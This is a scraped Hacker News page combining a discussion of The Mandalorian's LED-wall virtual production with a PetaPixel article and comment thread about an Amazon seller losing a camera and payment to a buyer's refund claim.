lmilcin(4307) 5 days ago [-]

I don't care how 'groundbreaking' the graphics pipeline is. I watched a couple of episodes and I had to force myself to keep watching to, I don't know, give it a chance?

I wonder when The Industry will figure out that the story is more important than the graphics. You don't buy books for a beautiful cover and typesetting... at least most of you don't, and not most of the time.

anigbrowl(67) 5 days ago [-]

I enjoyed the story and apparently many other people did too. It's fanservice for sure, hence all the callbacks to characters and aliens that had background or very brief appearances in the original movies and left people wanting more. Cheesy, perhaps, but the entire franchise is pineapple pizza in space.

cgrealy(10000) 5 days ago [-]

Whether or not you liked the story is utterly irrelevant to the article.

en4bz(10000) 5 days ago [-]

I think the demise of Lytro was a huge missed opportunity for the film industry. They had this and a number of other features in their cinema camera before they became defunct a few years ago.

https://www.youtube.com/watch?v=4qXE4sA-hLQ

anchpop(3692) 5 days ago [-]

I watched that video, and it doesn't really seem like the same thing as in this article (although it's very cool). This is a real screen behind the actors rendering the scene from the perspective of the camera.

mdorazio(10000) 5 days ago [-]

For those wondering, this appears to be not nearly as expensive as I thought. The 20-inch-square panels used are available for around $1000 each if you buy a lot of them used. Compared to a typical production budget for a high-quality franchise, it's surprisingly cheap to build one of these walls. The equipment to run it, on the other hand, is likely not cheap at all.

ishtanbul(4315) 4 days ago [-]

If The Mandalorian had been filmed entirely on location with VFX in post, it would have cost hundreds and hundreds of millions. The sets were incredibly detailed. So I think they saved a ton of money for the output quality. I also doubt they bought second-hand gear.

oseibonsu(3224) 5 days ago [-]

Here is the Unreal Engine tech they are using: https://www.unrealengine.com/en-US/spotlights/unreal-engine-... . This is a video of it in action: https://www.youtube.com/watch?v=bErPsq5kPzE&feature=emb_logo .

KineticLensman(10000) 5 days ago [-]

Unreal Engine is also used by the BBC to create virtual studios for football punditry programmes. This uses a simpler green screen technology, but it demonstrates how Epic are moving away from their gaming roots.

jahlove(10000) 5 days ago [-]

Here's a video of it in action on The Mandalorian set:

https://www.youtube.com/watch?v=gUnxzVOs3rk

foota(4261) 5 days ago [-]

That's really cool!

tigershark(10000) 5 days ago [-]

Please send me a link to someone who watched the original Star Wars, the later trilogy, and finally the last "attempt", and really appreciated it. I even watched "Rogue One" on the biggest screen available around me, with high expectations, and I'm feeling really sad because of that.

vidarh(4286) 4 days ago [-]

I've seen all of them, and loved all of them.

To me, most of the criticism feels like it comes from people who have had time to rationalize the old plots and settings, but who see the new ones with a more jaded mind or a set idea of what they 'should' be like instead of approaching them with an open mind. They have flaws, but so does the original trilogy.

Star Wars from the beginning were silly westerns set in space with all kinds of ridiculous aliens thrown in. Taking them too seriously and applying that as a constraint on the following trilogies would never end well.

When people complained about Jar Jar, for example, all I could think about was how people could take issue with Jar Jar but take no issue with Chewbacca, or the Ewoks, or R2D2 and C3PO. The originals are also incredibly cheesy in other ways that were common in the '80s but are really dated today (e.g. the Ewok celebration scene).

I think seeing e.g. Spaceballs is a good way of having it driven home just how ridiculous Star Wars really is, and how it looked at the time, if you don't let yourself be immersed in it. Spaceballs crosses the line from 'serious' space opera to comedy very clearly, but to me it also illustrates just what ridiculous lengths they had to go to in order to clearly be a send-up instead of a cheap Star Wars knockoff. They'd not have had to cut that many jokes or tone back that many things before it'd have seemed like an attempt at being serious.

Star Wars is fun in part because it manages to 'sell' a setting that is on the face of it so crazy and not taking itself too seriously. But it seems a lot of the fans of the original trilogy bought into that and then decided to take it all very seriously instead of seeing them as light adventure movies and 'space westerns'.

The challenge is also, in no small part, a question of changing tastes in other ways as well: my son finds the original trilogy horribly slow-moving to the point of boredom, for example, and I can understand that. Tastes have changed. Pacing has changed. Composition and cinematography have changed. But that also means that the modern trilogies had to be very different or fall flat with younger audiences in ways that would always annoy the die-hard fans; they're trying to reflect how we remember the originals more than how they are, and different people remember them in different ways.

[I tend to treat criticism of the last Indiana Jones in much the same way; people venerate the original movies, but they were extremely cheesy and contrived, involving literal deus ex machina, yet surviving a test explosion in a fridge and interdimensional aliens is suddenly over the top.]

As for Rogue One, to me it's one of the most enjoyable movies of the franchise. In no small part because they were allowed to explore the setting with much more freedom (ok to let characters more central to the plot die for example).

UI_at_80x24(10000) 5 days ago [-]

I watched the original trilogy in the theaters when they were released. (Admittedly I was a bit young for the first one.)

I've seen all the follow-ups/add-ons/sequels/rewrites that exist. Rogue One is the movie I waited 30 years for: another story in the SW universe. It wasn't perfect, but it was damn good enough.

The Mandalorian gives me hope that 'Grownups' are in charge and can create something worth looking at.

I am holding out hope that a story and plot will emerge. I really hate 'baby yoda', but if that's what it takes to move a real story along I am willing to tolerate it.

#1 It looks incredible. Must win Emmy for best cinematography! #2 It feels real. It feels right.

I'm sorry you didn't like Rogue One.

aurizon(10000) 4 days ago [-]

I am over 80, I have watched them all, and enjoyed them all. What few criticisms I had were lost in the overall enjoyment of all that good work. What we do now makes those early shows look crude - which they are by modern standards, but in the day OOOOHHH, AAAHHHH. I still recall the first Star Wars crawl and it makes me shiver - I guess that's why they still use it...

jpmattia(4273) 4 days ago [-]

I've had a peripheral interest in virtual sets and real-time compositing by way of a colleague from grad school.

A quick visual summary of this tech: http://www.lightcrafttech.com/portfolio/beauty-beast/

This video was from a pilot several years ago, and it didn't make it to air, but it was visually wonderful.

russellbeattie(10000) 4 days ago [-]

With F. Murray Abraham as well! Nice. He's looked the same since 1984's Amadeus. Crazy!

mitchelhall(10000) 5 days ago [-]

Hi all, really cool that you have taken an interest in this project, a lot of your comments below are very insightful and interesting. I work on the team that deploys this tech on set. We focus on how the video signals get from the video output servers to the LED surfaces, coordinating how we deal with tracking methods, photogrammetry, signal delivery, operator controls and the infrastructure that supports all of this. As noted in some of the comments, the VFX industry solved tracking with mocap suits a long time ago for the post-production process. What we are exploring now is how we can leverage new technology, hardware, and workflows to move some of the post-production processes into the pre-production and production (main/secondary unit photography) stages.

If you are interested in checking out another LED volume setup, my team also worked on First Man last year. This clip shows a little more of how we assemble these LED surfaces as well as a bit of how we use custom integrations to interface with mechanical automation systems. [https://vimeo.com/309382367]

m3at(4147) 4 days ago [-]

Great work! It must be a tremendously interesting job.

You might be able to answer my question, which is: why use LEDs exclusively and no projectors? I imagine it's mainly because projection is too dim and the main goal is to get good reflections. Is that something that was considered?

(I'm wondering as I found the work of teamLab very impressive, which rely heavily on projectors: https://www.teamlab.art/)

devindotcom(4030) 4 days ago [-]

Would love to talk to you! Are you at ILM or a partner like Fuse or ROE? You can contact me at devin at techcrunch dot com, I'm working on more pieces on this tech.

werber(3304) 4 days ago [-]

That article is mind-blowing. How do the tech side and the creative side work together on this kind of project? How much does the technology shape the storytelling?

kragen(10000) 5 days ago [-]

Thanks! This work is really inspiring! Are these OLED screens, matrices of separate LEDs of the usual InGaAs and GaN type, or LCDs backlit with LEDs? The 2.84 mm pixel pitch makes it sound like it's separate inorganic LEDs.

Are there times, short of sunshine, where you need more directionality to the lighting than the screens can provide? Because the screens can emit from any position, but not toward any particular direction, being quasi-Lambertian emitters.
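
(A toy illustration of that Lambertian point, assuming ideal emitters: radiant intensity falls off as the cosine of the angle from the panel normal, so light spreads over the whole forward hemisphere instead of forming a tight beam the way the sun does.)

    import math

    def lambertian_intensity(i0, theta_deg):
        # Ideal Lambertian emitter: I(theta) = I0 * cos(theta).
        return i0 * math.cos(math.radians(theta_deg))

    for theta in (0, 30, 60, 80):
        print(theta, round(lambertian_intensity(1.0, theta), 2))
    # 0->1.0, 30->0.87, 60->0.5, 80->0.17: plenty of light everywhere
    # forward, none of the hard directionality of a distant key light.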





Historical Discussions: Amazon let a fraudster keep my Sony a7R IV and refunded him (February 21, 2020: 726 points)

(729) Amazon let a fraudster keep my Sony a7R IV and refunded him

729 points 4 days ago by ProAm in 1490th position

petapixel.com | Estimated reading time – 5 minutes | comments | anchor

I am an amateur photographer, and I've sold cameras non-professionally on Amazon for over eight years as I've upgraded. That trend comes to an end with my most recent transaction. In December, I sold a mint-in-box Sony a7R 4, and the buyer used a combination of social engineering and ambiguity to not only end up with the camera, but also the money he paid me.

Amazon's A-to-Z Guarantee did not protect me as a seller. Based on my experience with this transaction, I cannot in good faith recommend selling cameras on Amazon anymore.


Author's Note: This is a summary and my personal opinion, and not that of my employer or anyone else.


Here's what happened.

I ordered a second Sony a7R 4 as a backup for a photoshoot. My plan was to then resell it, as the seller fees were slightly less than the rental fees at the time. I listed it on Amazon, and it was almost instantly purchased by a buyer from Florida. I took photos of the camera as I prepared it for shipment, and used confirmed & insured two-day FedEx. The package arrived at the buyer's address on December 17th.

The buyer listed an initial for his last name—that should have been a red flag. It gave him a layer of anonymity that will be relevant later.

On December 24th, I apparently ruined Christmas, as the buyer now claims that accessories were missing. Throughout this whole ordeal, I've never heard directly from the buyer, in spite of numerous email communications. He never told me which "product purchased/packaging" was missing.

I started a claim with Amazon, showing the photographic evidence of a mint-in-box a7R 4 with all accessories. I denied the return. The buyer offered no photographic proof or other evidence that he received anything but a mint camera.

To this day, I have no idea what he claimed was "missing" from the package. I even included all the original plastic wrap!

After about a week of back-and-forth emails, Amazon initially agreed with me.

Somehow, a second support ticket for the same item got opened up. The issue was not yet resolved. The buyer kept clawing back. The next day, I get an email about a "refund request initiated." On this second ticket, Amazon now turned against me.

Now, we're in 2020. The buyer apparently shipped the camera back to me; however, he entered the wrong address (forgetting my last name, among other things). The package was returned to sender, and I never got to inspect what's inside. Whether that box contained the camera as sent in like new condition, a used camera, or a box of stones is an eternal mystery.

Truly, had he shipped it to the right address, I would have had multiple witnesses and video footage of the unboxing.

Here's where it gets interesting: as I appeal the claim, Amazon notes that the buyer is not responsible for shipping the item back to the correct address, and they can indeed keep the item if they want to, following the initiation of an A-to-Z Guarantee.

Indeed, I have a paper trail of emails that I in fact sent to Amazon. Somehow, they got their tickets confused. When I followed up on this email, they shut off communication.

So, as a buyer, you can keep an item with "no obligation to return," even if you can't substantiate your claim of "missing items or box." Now the buyer has the camera, and the cash.

The whole experience has been frustrating, humiliating, and sickening to my photography hobby. I hope that this serves as a cautionary tale for selling such goods on Amazon, if my experience is any indication.

As of now, I've emailed the buyer again to ship the camera back to me, and I have a case open with Amazon, in which I provide the 23 emails they claim I never sent them. That case was closed with no response from Amazon. I had an initially-sympathetic ear through their Twitter support, until I mentioned the specifics of my case.

Recommendations

  • If you're going to sell on Amazon or elsewhere, take an actual video of you packing the camera. You need all the defense you can get against items mysteriously disappearing.
  • Investigate more even-handed selling services, like eBay, Fred Miranda, or other online retailers.
  • If you need a backup camera, go ahead and rent one. I'm a frequent customer of BorrowLenses, and I infinitely regret not using them this time.
  • Update your personal articles insurance policy for any moment that the camera is in your possession, and use something like MyGearVault to keep track of all the serial numbers. I only had the camera for a couple of days altogether, but that was enough.

I hope that this was a worst-case, everything-goes-wrong scenario, and I hope that it doesn't happen to anyone else. There ought to be more even-handed failsafes for these transactions.


About the author: Cliff is an amateur landscape and travel photographer. You can find more of his work on his website and Instagram account.




All Comments: [-] | anchor

canada_dry(4164) 4 days ago [-]

This is such a basic issue that I don't understand why USPS or some other shipper with brick-and-mortar locations hasn't stepped up to offer some sort of package-shipping certification.

If I were the seller, it could work as simply as my bringing the item to a shipper, who would take their own photos, weigh the items being packaged up, and do some check that the item is as described to the recipient. In turn, the shipper would get an extra fee.

For high-value items (like OP's camera) it would certainly be in everyone's best interest, and platforms like eBay, Facebook, and Amazon could insist that all parties use this type of service or relinquish their ability to dispute.

Too over simplified??

bonestamp2(10000) 4 days ago [-]

Sounds reasonable, and it could be fairly automated too. You can already take Amazon returns to UPS stores, Whole Foods, or Kohl's, and they will box them for you. All they need is a camera system to video the boxing and then associate the shipping label/tracking number with that video.

The boxing video could be made available on the courier's site for any interested party to see (when enabled by the shipper). Sure, it may not capture the quality of an item, but that's a fairly small detail that can be resolved with a return/partial refund and it would at least put an end to the rampant fraud that goes on.

bufferoverflow(3706) 3 days ago [-]

You can still fool that system by shipping a broken camera. USPS won't be checking the functionality.

dharmab(10000) 4 days ago [-]

Isn't this a form of escrow service? Those are sometimes used when buying very expensive items via auction/real world.

sas41(10000) 3 days ago [-]

This is exactly how it works in Bulgaria: most second-hand marketplaces use a courier who offers the following process.

You describe what you are shipping, how much you want for it and who covers the shipping costs.

The buyer goes to the courier office and inspects the item; if they agree to buy it, they sign off on it and pay the price plus shipping (if they're the one who's supposed to pay for shipping), and the seller can get their cash from an office near them the next day.

The important bit is that the buyer inspects the item and signs for it if they buy it; if they refuse, they cannot keep the item.

dwnvoted2hell(10000) 3 days ago [-]

Once again, it could be the post office to the rescue, if only the post office decided to do a basic extension of the services they already offer.

However, even if this came to pass, you would still have a new requirement: showing the product exactly as it was originally sold. And for highly technical products there is absolutely no way to do this efficiently without hiring technicians for specific product types. Most products would need some kind of established rubric for how close to original condition they currently are, and nothing like this exists that I know of. Processing and running a system like this would require fees of approximately 10-20% of the cost, which is not infeasible, but most people already balk at sales fees of 5%.

clSTophEjUdRanu(4315) 4 days ago [-]

There is already registered mail via USPS. The Hope Diamond was delivered to the Smithsonian via registered mail.

giarc(10000) 4 days ago [-]

At a Purolator (Canadian courier) mailing centre near me, they have a system that weighs the box and also measures its dimensions. The whole rig is ceiling-mounted (while the scale is on a counter). I suspect a rig like this could also incorporate a camera that takes a photo of the contents.

tyingq(4263) 4 days ago [-]

'Screw the seller' is a proven winner for eBay, shipping services, credit card companies, etc. They are just following tradition.

CobrastanJorji(4320) 4 days ago [-]

You know, I'm surprised that those mailbox stores don't offer exactly this sort of service. Buyer and seller give a deposit to a postal store, the seller mails product to the store, the buyer inspects the product at the store and decides whether to keep it, and, if so, pays the balance to the store and walks out with the product, and presumably there could be a process for undoing it by returning the product to that same store later if a serious problem has emerged. I guess it's a lot of overhead for buying a video game or something, but it would make sense for $500+ transactions.

Those stores already have notaries, help with shipping, provide mailboxes, and the like. It'd fit pretty well into their wheelhouse.

S_A_P(4289) 4 days ago [-]

I sell quite a bit of vintage music gear on Reverb. I initially had some struggles with customers, but they seem to have mostly kept the riff-raff out. I think the fact that it's still slightly a niche site keeps the volume down low enough to keep humans involved. As they were recently purchased by Etsy, I'm wondering if this sort of service will start to drop off. Fingers crossed; I'm selling a vintage Oberheim right now, and I would be sick if a similar circumstance happened...

I stopped using eBay because most of the sellers just weren't trustworthy enough. Amazon keeps trying to blur the line between marketplace and the company, which IMO is a bad move. I think they should run it in a manner similar to Reverb: charge higher fees to pay for it (within reason) and actually do something to scammers on both sides of the transaction...

harikb(3684) 4 days ago [-]

There is a certain risk associated with buying used items. Even an item exchanged for cash via Craigslist can have issues, say a lens problem that only shows up in certain lighting. Too bad; we can't solve that.

However, these platforms can solve anonymity: maybe UPS could verify ID and address, in addition to basic checks with an item photo and weight. That is, make it equivalent to an in-person exchange.

graylights(10000) 4 days ago [-]

Would that service be indemnifying the seller from fraud? Or is your assumption that the platform would just make the right call?

Probably it's because the platforms don't want to build services to root out fraud, because then they become more responsible for owning it. Outside services can't break in because the platforms aren't going to put trust in them. Those services would have to own the cost of fraud.

kube-system(10000) 4 days ago [-]

> Too over simplified??

Probably. These shipping services don't really have any expertise to accurately judge the quality of many of the items they ship. They just move boxes around.

Some rando at FedEx Office doesn't really know how to determine that your DSLR has the advertised shutter count, nor do they know how to verify the SMART status of those hard drives you shipped, nor would they be able to validate the authenticity of your designer handbag.

There are specialized consignors popping up online that do have the ability to do these things, though.

tikiman163(10000) 4 days ago [-]

That's called escrow. It's complicated and expensive, and it requires that the third party be verifiably trustworthy, because they effectively have all the power.

jrockway(3532) 4 days ago [-]

At least for camera equipment, this does exist. You can take your camera to B&H's used department, and they will buy it from you. You can also go to B&H's used department and buy a used camera from them.

The advantage of this over Amazon is that as a seller, you know B&H isn't going to screw you over in any way, and if they do, you know where to serve your lawsuit. A trusted business with a physical location is the counterparty in your transaction, which makes it pretty low risk. As a buyer, you know B&H is trustworthy and you can come back to the store and have a problem resolved.

Amazon offers nothing in a typical Amazon.com transaction beyond matching buyer and seller. They can't trust the buyer, and they can't trust the seller. So they can't really help with the transaction in any way, they are just there to take a cut for basically nothing. B&H takes a larger cut, but they actually do something.

Of course, people like money, so Amazon is rolling in it while most people don't even know that they can sell their camera to B&H. (I've bought used stuff from them because I don't trust random eBay listings, but never sold anything because the amount of money they offer wasn't worth it to me.)

kazinator(3922) 3 days ago [-]

Too over complicated.

https://en.wikipedia.org/wiki/Cash_on_delivery

COD is so old, it's the name of an AC/DC song. (Well, there it stands for 'care of the devil', never mind.)

joshspankit(10000) 4 days ago [-]

There's one risk that seems to be missed:

Fraud by delivery company staff. Someone might choose to risk their job for a verified $2k+ package. More so if they ended up with a truck full...

gnopgnip(10000) 4 days ago [-]

FedEx weighs packages at multiple stages, and this is accessible to the shipper. I suspect USPS and UPS weigh packages at least once, and this could be requested if there is a dispute. These don't do a lot to prevent fraud, and it would be difficult to provide authentication without specialized training. There are services that provide authentication with more expertise. StockX does it for new sneakers. The RealReal and a few others do it for luxury goods. Even with authentication by experts it is not 100% certain that you are getting authentic goods, and there will be some dispute process. In practice, few buyers would use a platform that completely blocks returns.

You could sell your camera to a company like KEH, and they take on nearly all of the seller side risk when dealing with consumers.

The real problem here is that Amazon did not follow its own policies and refunded the buyer when the buyer did not provide proof of delivery for the returned item; it's not anything else about the system in general. The recourse for that is small claims (or arbitration, but small claims is probably better for you, and it is allowed as an exception to the required arbitration).

sizzle(744) 4 days ago [-]

Isn't this how mortgage escrow essentially works?

sevenf0ur(10000) 4 days ago [-]

> If you're going to sell on Amazon or elsewhere, take an actual video of you packing the camera. You need all the defense you can get against items mysteriously disappearing.

Isn't this evidence just as bad as the buyer's account that he didn't receive any accessories? One could just unpack the box right after filming.

uberduber(10000) 4 days ago [-]

I do this on high value items. I pack the item in the car though for safety and film continuously until drop-off.

wtallis(4223) 4 days ago [-]

> Isn't this evidence just as bad as the buyer's account that he didn't receive any accessories?

No, of course not. Buyer didn't provide any details about what was missing or what was received. This isn't a level he-said/she-said, it's one party being forthcoming and the other evasive. Both parties had equal opportunity to lie, but only one put in effort to appear honest. Amazon should at least hold their scammers to a higher standard.

_underfl0w_(10000) 4 days ago [-]

I think this every time someone suggests filming part of the transaction. Nowhere does video of an action imply that it was not immediately undone right after filming.

dmitrygr(1849) 4 days ago [-]

Pack it in a FedEx store, film yourself handing it over to a store employee, and keep filming until they scan the box in. Their tracking will show them receiving the box. At that point it is in their custody and you are not getting it back, so you cannot re-open it.

abbot2(10000) 4 days ago [-]

I totally get the frustration and such, and I'm not trying to protect Amazon, but: the author's web site intercepting browser history to trigger a 'check out this content before you leave' prompt when back navigation is clicked is outright evil. Just don't do that; be kind to visitors.

Edit:

1. Dictionary: evil, adj.: morally bad, cruel, or very unpleasant

2. To get the prompt you need to stay on the page for a while, scroll around, pretend to read it. It triggers at least in mobile Chrome.

draw_down(10000) 4 days ago [-]

Come on.

unreal37(3618) 4 days ago [-]

Let's have some perspective on what 'outright evil' really is.

You didn't get hurt by this.

bcrosby95(10000) 4 days ago [-]

I think your use of evil is about as evil as the pattern. Overblown rhetoric harms discourse.

Sohcahtoa82(10000) 4 days ago [-]

I did not get that prompt. I even tried disabling my ad blocker and did not get that prompt.

EDIT: Also, I think 'outright evil' is a bit strong. A dark pattern for sure, but not quite evil.

matsemann(10000) 4 days ago [-]

Not the first time Amazon is on blast here for expensive camera gear scams: I Fell Victim to a $1,500 Used Camera Lens Scam on Amazon [0]

[0]: https://news.ycombinator.com/item?id=14993216

CamelCaseName(4319) 4 days ago [-]

Unfortunately, there are plenty of categories that are absolute breeding grounds for scammers. Camera lenses is definitely one of them.

As a general rule, if the main differentiating feature of the product is hard to verify, or if the product is expensive and easy to resell, stay away.

ebaySucks123(10000) 4 days ago [-]

I had the same exact experience the last time I sold on ebay, in 2017. I sold an $800 item. One day before the claim window closed, the buyer filed a claim saying it had never arrived and claiming they emailed me several times and I never responded. I submitted proof of delivery from UPS and pointed out the simple fact that I had received no messages from the buyer through ebay messaging. Ebay gave them a full refund and refused to speak to me about it. When I called them and waited on hold for several hours, they literally just hung up on me. I closed my ebay and paypal accounts and I'll never use them again.

pdxbigman(10000) 4 days ago [-]

Stories like this are why I've never bought or sold anything on eBay. It just seems like a genuinely shitty experience, and I'd rather shell out extra cash to buy new, or meet someone off Craigslist at a bank.

JoshGlazebrook(2016) 4 days ago [-]

I have a similar story. I sold a brand new iPhone to someone on eBay who claimed it was reported as stolen and could not be used. PayPal refunded the buyer and allowed them to keep the phone. My PayPal account went negative, and their internal collections started calling every day, right away, even though the charge was in dispute.

Even after providing proof that the IMEI was not reported as stolen, and them waiting weeks for the buyer to provide any proof (they didn't), they still sided with the buyer. I called for weeks, and finally after about two months, somehow the person on the phone was able to just issue a refund. I've not sold anything on Ebay since.

On top of that, when I had an issue with buying something through PayPal, they used that ^ instance as a negative against me while on the phone. 'Well, I see you sold a stolen iPhone in the past...' was not something I was expecting to hear.

amatecha(10000) 4 days ago [-]

Yeah, I've heard stuff like this for years and years and long ago decided I will never sell anything online. Craigslist in-person only.

filoleg(10000) 4 days ago [-]

EBay in 2017 was a giant shitshow (and probably still is, but I don't use it anymore). Both their security and support are complete trash, even if you happen to be lucky (like me) and they reply quickly.

I woke up one morning to an email notification thanking me for purchasing a back bumper, a wing, and a few other parts for a 2012 Hyundai Genesis, which I obviously don't have, nor had I made that purchase. The fraudster even put their real delivery address and name, less than 20 miles from where I lived (which I reverse-searched, confirming the name was associated with that address). I immediately notified eBay about this; they refunded me the purchase and asked me to change my password. I did all that and removed the perp's address from the account, but eBay didn't have a legitimate 2FA solution, so I was kinda out of luck here.

Lo and behold, the day after, I woke up to find the info on my account (name + address) changed again. They couldn't change the email, as I have 2FA on my email account, but they did everything they could aside from that with my eBay account. This repeated at least one more time afterwards. By the end of this saga, I just gave up and closed my eBay account after getting my refund.

I just did some googling, and it seems like eBay STILL doesn't support any form of 2FA aside from an SMS-based one (which is exactly how, I suspect, they got into my account in the first place, as my email wasn't compromised). What a shame, but oh well.

_-___________-_(4150) 3 days ago [-]

I tried, once, to sell something on eBay. I specified clearly that I would only ship the item to the UK. Someone bought it with a shipping address in Portugal. I refused to ship it. eBay 'rejected' my refusal. I sold it on Gumtree instead. eBay charged me success fees for the item, since it had 'sold'. eBay refused to communicate with me about refunding these success fees, so I filed a chargeback with my credit card company. eBay closed my account because of the chargeback.

heavyset_go(4298) 4 days ago [-]

I'm getting ads that state if I buy the ad-purchaser's product on Amazon and leave a good review, they'll refund my money. Basically, they're ads that say 'Free [Product]!' and when you click them, they ask you to purchase the product, leave a positive review and then they'll refund you.

I tried to look for a way to report the seller to Amazon, but from what I found, I need to have a seller account with Amazon to do so, which I don't. As a customer, I can't report the product without buying it first. Does anyone have a link or email I can use to reach out to someone at Amazon about this?

Some of these products have thousands of positive reviews[1]. I find it misleading, and to be a nuisance to consumers who rely on these reviews to guide their purchases. I don't know why Amazon makes it so difficult to report these fraud schemes.

Since I found it difficult to reach out to Amazon, I reported the seller to my state Attorney General's consumer protection division and to the FTC. Since then, I've gotten even more ads like this, and I don't have the time to report them all to agencies that may or may not follow up on my reports.

[1] https://www.amazon.com/dp/B07NRGR9LL

milankragujevic(2321) 4 days ago [-]

A similar thing happened to me with PayPal: the buyer got to keep the item and got a refund (by doing a chargeback on their CC), and I got billed the amount plus 15% in fees and penalties. I provided exhaustive proof of delivery and showed that there was no contact or complaint from the buyer, but they didn't care. They said that since it's a chargeback, they HAVE to give the buyer their money back. The buyer was a client of Commonwealth Bank of Australia.

Ironically, when I tried doing a chargeback on a transaction as a buyer, I got denied after waiting for 30 days for a reply, and had to pay a fee for an 'untruthful claim'. The bank is Erste Bank in Serbia. In my opinion my claim was valid, as the seller did not reply to me at all.

nicolas_t(4200) 4 days ago [-]

Interestingly, I've noticed the same about chargebacks. I tried to file a chargeback with my bank in France and got denied, despite it being a valid claim and me providing all the documentation for it.

But when I used my US credit card to file a chargeback, it went through fine and there was no issue. I wonder if some countries are more lax with chargebacks?

pxtail(10000) 3 days ago [-]

This is a recurring theme with PayPal, and some US citizens are perfectly aware that when it comes to a dispute they'll get preferential treatment versus a non-US seller, with the money returned no matter what.

This mechanism is quite often used for fraud, and unwary entrepreneurs can be robbed of their money: PayPal will refund the money and close the case without hesitation. I think the only solution would be the court route, but in some cases the equipment's cost may be lower than the attorney and court costs (on top of the seller not being used to the procedures and not knowing what to do).

ikeboy(447) 4 days ago [-]

>I denied the return.

And that's your problem. If you deny a return within the return period, you're in violation of Amazon policy, and the A-Z team will rightly rule against you. The correct response is to accept the return, then deny a refund after it comes back to you because it wasn't sent back with the same accessories you sent it with.

normalnorm(10000) 3 days ago [-]

> If you deny a return within the return period, you're in violation of Amazon policy, and the A-Z team will rightly rule against you.

Amazon makes the laws and acts as a court now? I don't understand why people respect 'company policy' so much. The laws of the land take precedence. We are not corporate slaves.

scottlamb(10000) 4 days ago [-]

Why do they have a 'violate policy and eventually lose dispute' button then?

stordoff(10000) 4 days ago [-]

> S-2.2 Cancellations, Returns, and Refunds. The Amazon Refund Policies for the applicable Amazon Site will apply to Your Products. Subject to Section F-6, for any of Your Products fulfilled using Fulfillment by Amazon, you will promptly accept, calculate, and process cancellations, returns, refunds, and adjustments in accordance with this Agreement and the Amazon Refund Policies for the applicable Amazon Site

https://sellercentral.amazon.com/gp/help/external/G1791

> What should I do if a buyer wants to return an item?

> All Amazon sellers are required to accept returns.

https://sellercentral.amazon.com/gp/help/external/G200495860

lukevdp(4317) 4 days ago [-]

I came here to say this also. You can't reject the return, you need to accept it and then it's on the buyer to return the item to you.

If it comes back with parts missing, you can do a partial refund. Buyer can still do an A-Z claim, but you're in a much stronger position, especially if you have proof of how you sent it and how you received it.

tus88(10000) 4 days ago [-]

There is no perfect system that protects buyers and sellers. Change the rules and buyers will be complaining. The reason it is skewed towards buyers is:

1) Who in their right mind would buy something online where there is no protection? (Sellers aren't the same, as they have to sell somewhere to make a living.)

2) Most buyers are honest people who just want their item. Profiting from fraud as a buyer is a lot more work, as they need to resell the item to gain currency, which is risky (both from exposing themselves to stolen-item investigations and from becoming a victim of fraud themselves as a seller).

3) Imagine if sellers could just ship rocks to buyers instead of cameras without consequence. Every scammer and his dog would be in on the gig within 5 seconds. (1) becomes even more bleak.

The general view is that sellers need to take fraud into their overall operating expense budget, just like department stores do with shoplifting.

briandear(1417) 4 days ago [-]

> The general view is sellers need to take fraud into their overall operating expense budget, just like department stored do with shoplifting.

How's that work when selling a single item?

bcrosby95(10000) 4 days ago [-]

> 1) who in there right mind would buy something online where there is no protection (sellers aren't the same as they have to sell somewhere to make a living).

Buyers also generally have to buy somewhere, especially for necessities. The difference is that finding a place to buy is easier than finding a place to sell.

> 2) most buyers are honest who just want their item. Profiting from fraud as a buyer is a lot more work as they need to resell the item to gain currency, which is risky (both from exposing themselves to stolen item investigations as well as being a victim of fraud themselves as a seller).

You don't have to just resell to profit. Just buy stuff you want anyways then complain.

> 3) imagine if sellers could just ship rocks to buyers instead of cameras without consequence. Every scammer and his dog would be in on the gig without 5 seconds. (1) becomes even more bleak.

The current system works because there are many buyers and few sellers. Most people are honest. And everyone buys things. But most people don't sell things. Skewing in favor of the buyer makes it so the few sellers aren't overrun by fraudsters. If even 10% of the dishonest people in the world were actively selling stuff on Amazon, it would probably be a huge problem.

freepor(10000) 4 days ago [-]

A seller can absorb fraud when they're doing hundreds or thousands of transactions. If each person is doing one transaction, the person hit can suffer life-altering consequences for some items.

CamelCaseName(4319) 4 days ago [-]

Wrong takeaway.

If you're going to sell on Amazon, use FBA.

A-z claims cannot be filed on FBA orders.

If this is in fact your last sale on Amazon, and you no longer intend to do business with them, email [email protected] as a last resort.

Keep in mind, that email should not be used lightly. Be succinct and stoic. Provide proof that you have done everything else to resolve the matter.

jasd(10000) 4 days ago [-]

It is unlikely that your email catches his (or his team's) attention. However, if it does, rest assured that he will shake things up to fix the root cause of the issue and likely get the team to refund your money as well.

csours(4107) 4 days ago [-]

Can you use FBA for one-off, used items?

lucasmullens(10000) 4 days ago [-]

Does emailing the CEO really work? If I contact regular Amazon support, I end up talking to a bot presumably since their employee time is so valuable. But I can just hit up Jeff like it's no big deal?

Honestly asking, there might be some special team to go through the [email protected] emails.

GuardLlama(4175) 4 days ago [-]

Meta takeaway, probably:

A popular PetaPixel post that gets coverage on additional social platforms is your only form of recourse against Amazon.

node1(10000) 4 days ago [-]

I have heard many stories online where customers bought new graphics cards/CPUs/camera gear 'Sold by Amazon.com' but instead received used ones, or received different, cheaper (older-generation) products.

It does not seem to be a good place to buy or sell expensive items.

tiborsaas(3977) 3 days ago [-]

I had the opposite happen to me :)

I ordered a 2017 Dell XPS and got the 2018 model instead, didn't complain.

simmers(10000) 4 days ago [-]

I've received two used products from Amazon (bought as 'new') in just the last year. First was an espresso machine. It wasn't even cleaned - coffee grounds were everywhere. The second was a robot vacuum that had a full dust bin. After turning it on, I could see the previous owner's home layout in its memory. In both cases, the product still worked and it wasn't worth the hassle of returning. Whenever I buy something, I make sure to check for non-Amazon alternatives, even box stores.

endorphone(3068) 4 days ago [-]

That can happen anywhere, through any medium (e.g. bricks in a box instead of a PS4 from Best Buy). It seems amply evident, despite the recurring horror stories on HN, that most customers are having a pretty decent time of using Amazon.

In any case, isn't the author's scenario pretty bizarre? I had no idea that Amazon served as a mechanism for selling one-off, small-scale used items. Further, the author mentions that it would be cheaper buying and selling than renting... only this is precisely the risk you need to factor into buying and selling (which could have been a fake cheque, getting rolled during the exchange, etc).

monomad1(10000) 4 days ago [-]

I bought a lamp for a rear projection tv a couple years ago. It burned out after a month. Amazon let me return it, but charged a restocking fee. That would've been fine, but I haven't been able to review the product for over a year now.

Fuck amazon - newegg is cheaper anyway.

jseliger(16) 4 days ago [-]

